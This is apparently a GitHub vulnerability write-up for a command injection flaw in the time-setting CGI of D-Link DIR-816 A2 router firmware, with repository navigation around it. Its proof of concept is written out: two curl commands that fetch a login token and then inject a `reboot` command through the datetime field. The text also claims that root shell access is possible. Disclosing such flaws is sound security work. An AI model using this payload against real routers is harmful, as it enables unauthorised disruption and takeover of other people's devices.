Skip to content

Latest commit

 

History

History

form2systime_cgi

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

D-link DIR-816 A2_v1.10CNB04.img Command injection vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

In /goform/form2systime.cgi, the Command injection vulnerability only needs to be met by datetime -:

Poc

First you need to get the tokenid

curl http://192.168.0.1/dir_login.asp | grep tokenid

Next, run the following poc, you can see that the router is restarted

curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=xxxxx -d 'datetime=`reboot`-:'

Finally, exp can be written to achieve the effect of obtaining a root shell